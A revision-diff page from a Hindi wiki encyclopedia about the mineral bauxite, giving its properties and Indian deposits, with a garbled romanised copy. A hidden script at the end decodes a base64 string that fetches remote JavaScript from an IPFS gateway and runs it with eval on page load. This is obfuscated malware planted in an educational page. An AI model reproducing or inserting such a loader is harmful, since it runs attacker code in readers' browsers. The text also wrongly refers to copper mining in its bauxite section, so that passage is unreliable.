Difference between revisions of "बॉक्साइट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''बॉक्साइट''' एक खनिज है। यह पत्थर सर्वप...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "khoj.bharatdiscovery.org" to "bharatkhoj.org")
 
(9 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
[[चित्र:Bauxite.jpg|thumb|250px|बॉक्साइट]]
'''बॉक्साइट''' एक [[खनिज]] है। यह पत्थर सर्वप्रथम [[फ्रांस]] में लैस बौक्स के निकट मिला था। इसी आधार पर इस खनिज का नाम बॉक्साइट पड़ा। इसी खनिज से विश्व का अधिकांश [[ऐलुमिनियम]] निकाला जाता है। इसका [[रंग]] [[सफ़ेद रंग|सफ़ेद]] या [[भूरा रंग|भूरा]] होता है। सामान्यत: इसमें [[लोहा|लोहे]] का अंश विद्यमान रहता है। लोहे की मात्रा पर निर्भर इसका रंग [[गुलाबी रंग|गुलाबी]] या [[लाल रंग|लाल]] होता है। खदान से निकलने पर यह इतना मुलायम होता है कि हाथ से टूट जाता है, पर [[वायुमंडल]] के संपर्क में आने पर इसकी कठोरता बढ़ जाती है। इसकी आकृति [[मटर]] के दानों के समान होती है, अत: इसको पहचानने में कभी कठिनाई नहीं होती। इसका आपेक्षिक [[घनत्व]] 2.0 से 2.6 तक है।
+
'''बॉक्साइट''' एक [[खनिज]] है। यह पत्थर सर्वप्रथम [[फ्रांस]] में लैस बौक्स के निकट मिला था। इसी आधार पर इस खनिज का नाम बॉक्साइट पड़ा। इसी खनिज से विश्व का अधिकांश [[ऐलुमिनियम]] निकाला जाता है। इसका [[रंग]] [[सफ़ेद रंग|सफ़ेद]] या [[भूरा रंग|भूरा]] होता है। सामान्यत: इसमें [[लोहा|लोहे]] का अंश विद्यमान रहता है। लोहे की मात्रा पर निर्भर इसका रंग [[गुलाबी रंग|गुलाबी]] या [[लाल रंग|लाल]] होता है। खदान से निकलने पर यह इतना मुलायम होता है कि हाथ से टूट जाता है, पर [[वायुमंडल]] के संपर्क में आने पर इसकी कठोरता बढ़ जाती है। इसकी आकृति [[मटर]] के दानों के समान होती है, अत: इसको पहचानने में कभी कठिनाई नहीं होती। इसका आपेक्षिक [[घनत्व]] 2.0 से 2.6 तक है। बॉक्साइट का निर्माण [[पृथ्वी]] की सतह पर या उसके निकट [[मिट्टी]] तथा [[ऐलुमिनियम]], [[आग्नेय चट्टान|आग्नेय शिलाओं]] के विघटन से होता है। बॉक्साइट [[पठार|पठारों]] के ऊपरी भागों में, पटलाकार पहाड़ियों में तथा चूने की शिलाओं में अनियमित समुदायों में मिलता है। [[भारत]] में इसके निक्षेप [[बिहार]], [[मध्य प्रदेश]], [[उड़ीसा]], [[मद्रास]] तथा [[कश्मीर]] में हैं।<ref>{{cite web |url=http://bharatkhoj.org/india/%E0%A4%AC%E0%A5%89%E0%A4%95%E0%A5%8D%E0%A4%B8%E0%A4%BE%E0%A4%87%E0%A4%9F |title=बॉक्साइट |accessmonthday= 28 अगस्त|accessyear=2014 |last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिंदी }}</ref>
 
+
==प्राप्ति स्थान==
बॉक्साइट का निर्माण [[पृथ्वी]] की सतह पर या उसके निकट [[मिट्टी]] तथा ऐलुमिनियम धनी, [[आग्नेय चट्टान|आग्नेय शिलाओं]] के विधटन से होता है। बॉक्साइट [[पठार|पठारों]] के ऊपरी भागों में, पटलाकार पहाड़ियों में तथा चूने की शिलाओं में अनियमित समुदायों में मिलता है। [[भारत]] में इसके निक्षेप [[बिहार]], [[मध्य प्रदेश]], [[उड़ीसा]], [[मद्रास]] तथा [[कश्मीर]] में हैं।
+
ऐलुमिनियम की प्राप्ति का स्रोत होने के कारण बॉक्साइट की गणना महत्त्वपूर्ण खनिजों में की जाती है। इसकी प्राप्ति लौह भस्मों के रूप में होती है जिनमें प्रमुख हैं- बोकमाइट, डायस्फोर तथा गिबराइट। भारत में मिलने वाले ये सभी भस्म लैटराइट प्रकार के हैं, जिनमें लाल एवं पीला लौहांश अधिक मात्रा में मिला रहता है। इसका कुल संचित भण्डार 303.7 करोड़ टन अनुमानित किया गया है। इनमें से 246 करोड़ टन ऐसे हैं, जिन्हें निकाला जा सकता है। इसका प्रमुख उत्पादक राज्य [[झारखंड]] है जहाँ [[रांची ज़िला|राँची]] एवं [[पलामू ज़िला|पलामू]] ज़िलों के ऊपरघाट तथा खुरिया क्षेत्रों में इसकी महत्त्वपूर्ण खाने स्थित हैं। [[छत्तीसगढ़]] के सरगुजा, [[दुर्ग छत्तीसगढ़|दुर्ग]], [[बिलासपुर छत्तीसगढ़|बिलासपुर]] आदि ज़िलों में, [[मध्य प्रदेश]] के शहडोल, [[बालाघाट]], [[जबलपुर]] आदि ज़िलों में, [[उड़ीसा]] के कालाहाँडी तथा सम्बलपुर ज़िलों में, [[गुजरात]] में [[सौराष्ट्र]] के धांगरवाड़ी नामक स्थान पर खेंड़ा, [[बड़ोदरा|बड़ोदरा]], राजपीपला आदि ज़िलों में, [[महाराष्ट्र]] के [[पुणे]], [[सतारा]], [[कोल्हापुर]], कोलाबा, थाणे एवं [[रत्नागिरि]] ज़िलों में, [[तमिलनाडु]] के [[नीलगिरि ज़िला|नीलगिरि]] के समीपवर्ती एवं कर्णन नदी की घाटी में, [[पालनी की पहाड़ियाँ|पालनी पहाड़ियों]] के क्षेत्र में, शेवराय पहाड़ी क्षेत्र में यरकुड के समीप तथा कोलामताई पहाड़ियों पर, [[कर्नाटक]] में बेलगाँव ज़िले में सिद्ध पहाड़, जम्बोतीबेटेन क्षेत्र, कसारासादा पहाड़ियाँ, कालानन्दी क्षेत्र तथा [[बाबाबूदान की पहाड़ियाँ|बाबाबूदन की पहाड़ियाँ]] आदि क्षेत्रों में ताँबे का [[उत्खनन]] किया जाता है। 2006-07 के दौरान में कुल 130.75 लाख टन बॉक्साइट का उत्पादन हुआ।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 9: Line 9:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{खान और खनिज}}
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
[[Category:नया पन्ना अप्रॅल-2012]]
+
[[Category:खान और खनिज]]
 +
[[Category:हिन्दी विश्वकोश]]
  
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 12:28, 25 October 2017

thumb|250px|b aauksait b aauksait ek khanij hai. yah patthar sarvapratham phraans mean lais bauks ke nikat mila tha. isi adhar par is khanij ka nam b aauksait p da. isi khanij se vishv ka adhikaansh ailuminiyam nikala jata hai. isaka rang safed ya bhoora hota hai. samanyat: isamean lohe ka aansh vidyaman rahata hai. lohe ki matra par nirbhar isaka rang gulabi ya lal hota hai. khadan se nikalane par yah itana mulayam hota hai ki hath se toot jata hai, par vayumandal ke sanpark mean ane par isaki kathorata badh jati hai. isaki akriti matar ke danoan ke saman hoti hai, at: isako pahachanane mean kabhi kathinaee nahian hoti. isaka apekshik ghanatv 2.0 se 2.6 tak hai. b aauksait ka nirman prithvi ki satah par ya usake nikat mitti tatha ailuminiyam, agney shilaoan ke vighatan se hota hai. b aauksait patharoan ke oopari bhagoan mean, patalakar paha diyoan mean tatha choone ki shilaoan mean aniyamit samudayoan mean milata hai. bharat mean isake nikshep bihar, madhy pradesh, u disa, madras tatha kashmir mean haian.[1]

prapti sthan

ailuminiyam ki prapti ka srot hone ke karan b aauksait ki ganana mahattvapoorn khanijoan mean ki jati hai. isaki prapti lauh bhasmoan ke roop mean hoti hai jinamean pramukh haian- bokamait, dayasphor tatha gibarait. bharat mean milane vale ye sabhi bhasm laitarait prakar ke haian, jinamean lal evan pila lauhaansh adhik matra mean mila rahata hai. isaka kul sanchit bhandar 303.7 karo d tan anumanit kiya gaya hai. inamean se 246 karo d tan aise haian, jinhean nikala ja sakata hai. isaka pramukh utpadak rajy jharakhand hai jahaan raanchi evan palamoo ziloan ke ooparaghat tatha khuriya kshetroan mean isaki mahattvapoorn khane sthit haian. chhattisagadh ke saraguja, durg, bilasapur adi ziloan mean, madhy pradesh ke shahadol, balaghat, jabalapur adi ziloan mean, u disa ke kalahaandi tatha sambalapur ziloan mean, gujarat mean saurashtr ke dhaangarava di namak sthan par khean da, b dodara, rajapipala adi ziloan mean, maharashtr ke pune, satara, kolhapur, kolaba, thane evan ratnagiri ziloan mean, tamilanadu ke nilagiri ke samipavarti evan karnan nadi ki ghati mean, palani paha diyoan ke kshetr mean, shevaray paha di kshetr mean yarakud ke samip tatha kolamataee paha diyoan par, karnatak mean belagaanv zile mean siddh paha d, jambotibeten kshetr, kasarasada paha diyaan, kalanandi kshetr tatha bababoodan ki paha diyaan adi kshetroan mean taanbe ka utkhanan kiya jata hai. 2006-07 ke dauran mean kul 130.75 lakh tan b aauksait ka utpadan hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. b aauksait (hiandi) bharatakhoj. abhigaman tithi: 28 agast, 2014.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>